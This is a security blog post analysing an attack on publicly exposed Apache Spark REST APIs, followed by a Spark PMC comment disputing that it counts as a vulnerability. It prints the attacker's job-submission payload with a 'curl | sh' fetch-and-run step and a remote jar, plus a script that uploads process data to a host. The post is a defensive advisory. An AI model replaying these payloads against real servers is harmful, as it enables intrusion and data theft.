Community Blog Alibaba Cloud Security Team Discovers Apache Spark Rest API Remote Code Execution (RCE) Exploit

Alibaba Cloud Security Team Discovers Apache Spark Rest API Remote Code Execution (RCE) Exploit

This article describes the discovery of the first "in-the-wild" Spark Rest API Remote Code Execution (RCE) vulnerability made by Fengwei Zhang and the team at Alibaba Cloud Security on July 7, 2018.

By Fengwei Zhang

More companies realize today they have valuable data that can transform to business insights. Hadoop paved the way to inexpensive centralization of the data processing and democratized building large repositories of data. Spark followed by enabling companies to build distributed processing and querying machinery more effectively than on Hadoop. Remote administration and maintenance of big data clusters coupled with insufficient protection created a rush by attackers to find and exploit vulnerabilities in these big data platform technologies.

Hadoop Yarn RCE Vulnerability was discovered by Alibaba Cloud Security Team on April 30, and today it is Apache Spark’s turn, with a new vulnerability discovered by our cloud security team on July 7.

Gaining access to large repositories of data could be the next preferred vector of cyber-attacks. This is because monetization can be achieved in a variety of ways: from direct use of computational power to mine digital coins to a full-scale intrusion of sensitive data, typically available unobfuscated for Spark jobs. While losing computational power may affect internal data processing, the backdoor for private data may present even a larger danger for unsuspecting enterprises.

Three important observations can be made. First, it is critically important to follow best practices when setting up infrastructure accessible from the outside. Second, your cloud provider should be a source for your security strength. Having an experienced security team that proactively discovers vulnerabilities, recommends remediation steps for customers, and takes a cloud-wide mitigation action, should be an important factor when deciding which cloud to deploy your big data infrastructure to. Finally, I would encourage to consider serverless model for big data processing, where infrastructure and its security is managed by your cloud provider.

Yuriy Yuzifovich,
Head of Security Innovation Labs (S.I.L.) at Alibaba Cloud

On July 7, 2018, the Alibaba Cloud Security Team discovered and performed an in-depth analysis of the first Remote Code Execution (RCE) exploit in Spark Rest API. In response to this threat, the team deployed several defense mechanisms against this attack on the Alibaba Cloud platform on July 9th, preventing mass exploitation of this vulnerability.

Alibaba Cloud Security has observed this new attack while it was apparently in the small-scale testing phase. However, a subsequent large-scale outbreak may happen at any time in unprotected environments. While we implemented cloud-wide measures to prevent exploitation at Alibaba Cloud, we strongly recommend that every organization running Spark both in our cloud and especially in other environments takes immediate action to prevent attackers to exploit this vulnerability. We outline our remediation recommendations at the end of this post.

Impact of the Exploit

Apache Spark is a fast and versatile open-source cluster-computing framework, originally developed at AMPLab at the University of California, Berkeley. It is designed for large-scale data processing, and many companies moved from aging Hadoop MapReduce to Spark for their big data needs. Apache Spark also provides a web user interface and corresponding REST APIs in order to let users control tasks and view results conveniently.

As many companies rely on their Spark server for analytics and big data processing, compromising a Spark server may expose sensitive data assets with potential damage going far beyond the loss of computing resources for coin mining. Intentional data corruption even on a single machine can lead to the collapse of the entire cluster of Spark-based distributed system.

Improper configurations of Spark permissions may cause attackers to create, delete, and view jobs without authorization, potentially leading to full remote code execution.

Details of the Exploit

Let's take a closer look at the attacker's operations:

  1. In the first step, the attacker discovers a Spark server with web UI service exposed on the web through mass scanning.
  2. The attacker sends the following request to the Spark server's REST API through port 6066. The attack payload instructs the server to remotely download SimpleApp.jar from a dark web location using onion.plus for subsequent stages, hiding behind .onion proxy routing.
    POST /v1/submissions/create
    { "action": "CreateSubmissionRequest", "clientSparkVersion": "2.1.0", "appArgs": [ "curl x.x.x.x/y.sh|sh" ], "appResource": "https://xxxx.onion.plus/SimpleApp.jar", "environmentVariables": { "SPARK_ENV_LOADED": "1" }, "mainClass": "SimpleApp", "sparkProperties": { "spark.jars": "https://xxxxxxxx.onion.plus/SimpleApp.jar", "spark.driver.supervise": "false", "spark.app.name": "SimpleApp", "spark.eventLog.enabled": "false", "spark.submit.deployMode": "cluster", "spark.master": "spark://x.x.x.x:6066" } }

    Please note that this is the first time that TOR "dark web" is used to spread this type of backdoor. According to security experts in Alibaba, this sort of approach will increase in the near future. In our estimation, about 5,000 Spark servers accessible on the web can be potentially exploited using this vulnerability.

  3. Reverse engineering analysis shows that the jar package is a backdoor program that downloads a shell script through onion routing and then executes it.


  4. The content of the shell script is as follows:
    ps ax --sort=-pcpu > /tmp/tmp.txt
    curl -F "file=@/tmp/tmp.txt" http://x.x.x.x/re.php
    rm -rf /tmp/tmp.txt

    This script only gathers and transmits performance information of a victim machine, without taking any further action, apparently giving the attackers on-the-ground intelligence to plan next steps, by taking the estimated power of a cluster into consideration.

Further Discussions

We estimate that currently more than 5000 Spark servers with port 8080 exposed to Internet are vulnerable to this attack. Some of them can be taken over to create a powerful distributed computational network, or to collect private data.

This is not the first time the Alibaba Cloud Security Team discovered a vulnerability related to distributed computing systems. We previously shared a report on the Hadoop Yarn vulnerability that shares many similarities with this new Spark attack.

With the continuing, rapid growth of the cryptocurrency economy, distributed systems with strong computing power but weak security capabilities will face more exploits by hackers.

Since the discovery of the Hadoop Yarn RCE vulnerability, it became one of the preferred methods of malicious bitcoin mining. Extrapolating on the Spark REST API RCE vulnerability, we believe that it will be exploited for mining and other malicious use very soon.

Suggestions for Remediation of Vulnerability

We suggest updating iptables or Security Groups to configure access policy, and restrict access to ports 8088, 8081, 7707, and 6066. Even a better solution would be not to expose these ports to the wider internet, unless absolutely necessary.

We also strongly suggest Spark's yarn control mode is used, as well as enabling HTTP Kerberos access control for the Web UI. If you are using a standalone version of Spark, you need to create a jar file for access control and set spark.ui.filters accordingly.

Further Reading

  1. Apache Spark Security Configuration: http://spark.apache.org/docs/latest/configuration.html#security
  2. Hadoop Yarn RCE Vulnerability: (Article in Chinese) https://www.toutiao.com/i6552678121449980423
1 0 0
Share on

Alibaba Cloud Security

32 posts | 15 followers

You may also like


srowen August 1, 2018 at 12:20 pm

I am posting on behalf of the Apache Spark PMC. This is not considered a security vulnerability and should not be advertised as such. This simply says that if one runs an inherently private service (Spark standalone master), but without enabling any ACLs or network security to block public access to it, that it can be accessed publicly. Of course it can.There is in general no expectation that a Spark cluster is publicly accessible. (The standalone master is also intended for 'simple' usage, and secure environments typically use another resource manager with its own security mechanisms.) Undoubtedly, someone somewhere has left one running on the public internet. However, these are not software problems, but unreasonably poor choices from individual deployments.The remedy is indeed to not provide public access to these services, or otherwise adopt other Spark resource managers with more elaborate security integrations. We can improve documentation to make this very clear.However, this should not be described as a security vulnerability. It suggests there will be a CVE and that a software patch is required. It isn't. Normal network security practices, and other Spark resource manager mechanisms, provide security to prevent this.Of course, we would not normally post about this in public. I do so because this blog was posted publicly at the same time it was raised with the Apache Spark PMC. If it were a vulnerability requiring a fix, this disclosure would be considered highly irresponsible. We encourage anyone reporting a vulnerability to follow the standard protocol at https://apache.org/security/